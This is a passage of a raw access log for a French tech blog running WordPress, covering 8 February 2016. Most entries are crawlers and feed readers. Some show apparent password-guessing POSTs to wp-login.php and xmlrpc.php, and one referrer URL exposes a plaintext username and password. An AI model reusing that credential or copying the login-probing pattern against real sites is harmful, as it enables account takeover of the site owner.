Safari/537.86.4\"\n31.34.43.241 - - [08/Feb/2016:15:14:20 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4\"\n31.34.43.241 - - [08/Feb/2016:15:14:20 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4\"\n198.58.99.82 - - [08/Feb/2016:15:16:37 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.199.68.116 - - [08/Feb/2016:15:20:56 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n198.58.99.82 - - [08/Feb/2016:15:24:34 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n91.210.146.69 - - [08/Feb/2016:15:32:04 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3059 \"http://alyaboom.com/wp-login.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\"\n66.249.64.196 - - [08/Feb/2016:15:33:46 -0800] \"GET / HTTP/1.1\" 200 7273 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n54.162.152.165 - - [08/Feb/2016:15:38:22 -0800] \"GET /marie-amelie-frere-la-serial-entrepreneure-a/ HTTP/1.1\" 200 9933 \"-\" \"Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)\"\n91.210.146.69 - - [08/Feb/2016:15:43:29 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3059 \"http://alyaboom.com/wp-login.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\"\n182.160.163.131 - - [08/Feb/2016:15:49:21 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n192.121.158.156 - - [08/Feb/2016:15:54:13 -0800] \"GET / HTTP/1.0\" 200 7191 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n68.180.228.42 - - [08/Feb/2016:15:55:16 -0800] \"GET /?p=47 HTTP/1.1\" 301 388 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n198.58.102.117 - - [08/Feb/2016:15:56:16 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n192.121.157.40 - - [08/Feb/2016:15:57:18 -0800] \"GET /robots.txt HTTP/1.0\" 200 386 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/10.0.2\"\n192.121.71.65 - - [08/Feb/2016:15:57:29 -0800] \"GET /robots.txt HTTP/1.0\" 200 386 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/10.0.2\"\n192.121.71.139 - - [08/Feb/2016:15:58:01 -0800] \"GET /robots.txt HTTP/1.0\" 200 386 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/10.0.2\"\n66.249.64.138 - - [08/Feb/2016:16:04:55 -0800] \"GET /post/101762362273/les-demi-verites-de-monsieur-xavier-niel HTTP/1.1\" 301 360 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n2.1.201.36 - - [08/Feb/2016:16:06:28 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n66.249.64.250 - - [08/Feb/2016:16:10:10 -0800] \"GET /post/97646423958/alexei-chemenda-toujours-etudiant-et-deja-entrepreneur HTTP/1.1\" 301 374 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n87.231.195.241 - - [08/Feb/2016:16:11:29 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n87.231.195.241 - - [08/Feb/2016:16:11:30 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n87.231.195.241 - - [08/Feb/2016:16:11:41 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n87.231.195.241 - - [08/Feb/2016:16:11:42 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n198.58.103.102 - - [08/Feb/2016:16:12:23 -0800] \"GET /feed/ HTTP/1.1\" 200 20987 \"http://techmeup.co/feed/\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n91.210.146.69 - - [08/Feb/2016:16:17:56 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3059 \"http://alyaboom.com/wp-login.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\"\n160.33.66.122 - - [08/Feb/2016:16:26:51 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 304 190 \"-\" \"Mozilla/4.0 (compatible;)\"\n178.154.189.201 - - [08/Feb/2016:16:29:51 -0800] \"GET /robots.txt HTTP/1.1\" 200 383 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n205.139.141.54 - - [08/Feb/2016:16:33:23 -0800] \"GET /alexei-chemenda-toujours-etudiant-et-deja/ HTTP/1.1\" 200 9585 \"-\" \"Mozilla/5.0 (compatible; Sysomos/1.0; +http://www.sysomos.com/; Sysomos)\"\n91.210.146.69 - - [08/Feb/2016:16:40:27 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3059 \"http://alyaboom.com/wp-login.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\"\n54.67.52.9 - - [08/Feb/2016:16:43:59 -0800] \"GET / HTTP/1.0\" 200 33325 \"-\" \"Mozilla/5.0 (Windows NT 6.3; rv:36.0 Gecko/20100101 Firefox/36.0\"\n198.58.103.28 - - [08/Feb/2016:16:52:08 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n91.210.146.69 - - [08/Feb/2016:17:03:20 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3774 \"http://alyaboom.com/wp-login.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\"\n50.116.30.23 - - [08/Feb/2016:17:08:14 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n83.166.234.6 - - [08/Feb/2016:17:13:10 -0800] \"GET / HTTP/1.1\" 200 7218 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1\"\n91.210.146.69 - - [08/Feb/2016:17:15:07 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3774 \"http://alyaboom.com/wp-login.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\"\n192.99.107.236 - - [08/Feb/2016:17:18:09 -0800] \"GET / HTTP/1.1\" 200 7218 \"-\" \"Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)\"\n207.46.13.30 - - [08/Feb/2016:17:26:18 -0800] \"GET /tagged/pinterest HTTP/1.1\" 301 523 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.147 - - [08/Feb/2016:17:26:29 -0800] \"GET /tagged/rockstar HTTP/1.1\" 301 522 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n66.249.64.132 - - [08/Feb/2016:17:28:57 -0800] \"GET /raodath-aminou-la-revolution-du-commerce-est-en HTTP/1.1\" 301 444 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n50.116.30.23 - - [08/Feb/2016:17:32:00 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n66.249.64.132 - - [08/Feb/2016:17:35:06 -0800] \"GET /raodath-aminou-la-revolution-du-commerce-est-en/?route=%2Fpost%2F%3Aid%2F%3Asummary HTTP/1.1\" 200 9183 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n207.46.13.30 - - [08/Feb/2016:17:40:07 -0800] \"GET /creer-sa-startup-seul-et-la-revendre-a-un-geant/ HTTP/1.1\" 200 10049 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.30 - - [08/Feb/2016:17:40:10 -0800] \"GET /michael-ferranti-responsable-marketing-a-mailgun/ HTTP/1.1\" 200 10560 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.30 - - [08/Feb/2016:17:40:12 -0800] \"GET /guillaume-decugis-le-monde-de-la-tech-sous-tous/ HTTP/1.1\" 200 10001 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.161 - - [08/Feb/2016:17:40:18 -0800] \"GET /je-viens-chercher-mon-stage-dans-la-silicon-valley/ HTTP/1.1\" 200 11342 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [08/Feb/2016:17:40:23 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15471 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [08/Feb/2016:17:40:25 -0800] \"GET /marketing-pour-developpeurs-partie-2/ HTTP/1.1\" 200 9527 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [08/Feb/2016:17:40:28 -0800] \"GET /category/portraits/page/4/ HTTP/1.1\" 200 7296 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n40.77.167.6 - - [08/Feb/2016:17:40:34 -0800] \"GET /ce-que-je-referais-autrement-invite-cedric-giorgi/ HTTP/1.1\" 200 9966 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n66.249.64.250 - - [08/Feb/2016:17:41:05 -0800] \"GET /marie-amelie-frere-la-serial-entrepreneure-a/ HTTP/1.1\" 200 9881 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n198.58.102.95 - - [08/Feb/2016:17:55:51 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.58.102.96 - - [08/Feb/2016:18:03:49 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n207.241.237.220 - - [08/Feb/2016:18:09:19 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.0\" 200 1674 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)\"\n207.241.237.221 - - [08/Feb/2016:18:18:49 -0800] \"GET /robots.txt HTTP/1.0\" 200 346 \"-\" \"Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)\"\n178.154.224.114 - - [08/Feb/2016:18:34:04 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots mtweb01t.yandex.ru)\"\n162.243.175.234 - - [08/Feb/2016:18:38:15 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n198.58.103.115 - - [08/Feb/2016:18:51:54 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n66.249.64.132 - - [08/Feb/2016:19:00:10 -0800] \"GET /du-side-project-a-google-le-fabuleux-parcours/ HTTP/1.1\" 200 11188 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n207.46.13.30 - - [08/Feb/2016:19:07:12 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n198.58.99.82 - - [08/Feb/2016:19:08:05 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n180.76.15.149 - - [08/Feb/2016:19:19:16 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n50.116.30.23 - - [08/Feb/2016:19:32:05 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.58.102.96 - - [08/Feb/2016:19:40:02 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n209.133.111.211 - - [08/Feb/2016:19:51:38 -0800] \"GET /feed/ HTTP/1.1\" 200 20931 \"-\" \"rogerbot/1.0 (http://www.moz.com/dp/rogerbot, rogerbot-crawler@moz.com)\"\n2.1.201.36 - - [08/Feb/2016:20:06:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n198.58.102.155 - - [08/Feb/2016:20:11:53 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n66.249.64.138 - - [08/Feb/2016:20:16:51 -0800] \"GET /feed/ HTTP/1.1\" 200 20987 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n212.193.117.227 - - [08/Feb/2016:20:20:56 -0800] \"GET / HTTP/1.1\" 200 7274 \"\" \"Mozilla/5.0 (compatible; statdom.ru/Bot; +http://statdom.ru/bot.html)\"\n185.25.48.72 - - [08/Feb/2016:20:24:05 -0800] \"GET / HTTP/1.0\" 200 33325 \"-\" \"-\"\n62.210.250.66 - - [08/Feb/2016:20:32:12 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [08/Feb/2016:20:38:17 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n154.68.4.143 - - [08/Feb/2016:20:41:03 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 4.0.4; GT-S7562 Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\"\n154.68.4.143 - - [08/Feb/2016:20:41:03 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 4.0.4; GT-S7562 Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\"\n154.68.4.143 - - [08/Feb/2016:20:41:04 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 4.0.4; GT-S7562 Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\"\n154.68.4.143 - - [08/Feb/2016:20:41:05 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 4.0.4; GT-S7562 Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\"\n154.68.4.143 - - [08/Feb/2016:20:41:06 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 4.0.4; GT-S7562 Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\"\n154.68.4.143 - - [08/Feb/2016:20:41:07 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 4.0.4; GT-S7562 Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\"\n154.68.4.143 - - [08/Feb/2016:20:41:35 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (Linux; Android 4.0.4; GT-S7562 Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\"\n85.26.241.76 - - [08/Feb/2016:20:43:32 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.26.241.76 - - [08/Feb/2016:20:43:36 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.26.241.76 - - [08/Feb/2016:20:43:36 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.26.241.76 - - [08/Feb/2016:20:43:37 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.26.241.76 - - [08/Feb/2016:20:43:38 -0800] \"GET /wp-content/uploads/2015/03/UX-Basics-Workshop-300x225.jpg HTTP/1.1\" 200 13031 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.26.241.76 - - [08/Feb/2016:20:43:38 -0800] \"GET /wp-content/uploads/2015/02/photo-7-300x225.jpg HTTP/1.1\" 200 17363 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.26.241.76 - - [08/Feb/2016:20:43:38 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-300x225.jpeg HTTP/1.1\" 200 9484 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.26.241.76 - - [08/Feb/2016:20:43:39 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n62.210.250.66 - - [08/Feb/2016:20:44:29 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n198.58.102.95 - - [08/Feb/2016:20:51:41 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n66.249.64.138 - - [08/Feb/2016:20:58:45 -0800] \"GET /nathan-barraille-lead-developer-a-slideshare/ HTTP/1.1\" 200 10473 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n185.25.48.72 - - [08/Feb/2016:21:02:12 -0800] \"GET / HTTP/1.0\" 200 33325 \"-\" \"-\"\n62.210.142.23 - jez [08/Feb/2016:21:06:06 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n198.58.103.36 - - [08/Feb/2016:21:07:52 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.58.103.28 - - [08/Feb/2016:21:15:45 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n62.210.250.66 - - [08/Feb/2016:21:19:22 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n69.195.124.123 - - [08/Feb/2016:21:28:15 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n178.255.215.65 - - [08/Feb/2016:21:41:02 -0800] \"GET /adrien-duermael-pixowl-et-lindustrie HTTP/1.1\" 301 396 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n178.255.215.65 - - [08/Feb/2016:21:41:48 -0800] \"GET /comments/feed/ HTTP/1.1\" 200 1442 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n198.58.102.95 - - [08/Feb/2016:21:51:01 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.58.103.160 - - [08/Feb/2016:21:59:35 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n77.75.76.168 - - [08/Feb/2016:22:08:09 -0800] \"GET /robots.txt HTTP/1.1\" 200 423 \"-\" \"Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)\"\n173.252.90.244 - - [08/Feb/2016:22:10:34 -0800] \"GET /wp-content/uploads/2015/02/3152875867_148b09f57d_z-300x225.jpg HTTP/1.1\" 200 9569 \"-\" \"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\"\n180.76.15.152 - - [08/Feb/2016:22:15:36 -0800] \"GET /pierre-lacombe-de-parrot-a-la-poursuite-du/ HTTP/1.1\" 200 9766 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n198.58.102.158 - - [08/Feb/2016:22:17:13 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n81.252.96.8 - - [08/Feb/2016:22:27:09 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 304 211 \"-\" \"Mozilla/4.0 (compatible;)\"\n66.249.64.250 - - [08/Feb/2016:22:34:35 -0800] \"GET /le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/ HTTP/1.1\" 200 9020 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n109.134.177.188 - - [08/Feb/2016:22:35:01 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n109.134.177.188 - - [08/Feb/2016:22:35:02 -0800] \"HEAD /apple-touch-icon-precomposed.png HTTP/1.1\" 404 447 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n134.249.65.86 - - [08/Feb/2016:22:36:45 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29530 \"http://www.autowebmarket.com.ua/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6\"\n178.137.93.235 - - [08/Feb/2016:22:49:43 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29364 \"http://confib.ifmo.ru/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)\"\n185.82.148.10 - - [08/Feb/2016:22:59:31 -0800] \"GET /rss HTTP/1.1\" 301 373 \"-\" \"Scoop\"\n62.210.248.185 - - [08/Feb/2016:22:59:34 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:22:59:34 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:22:59:34 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif 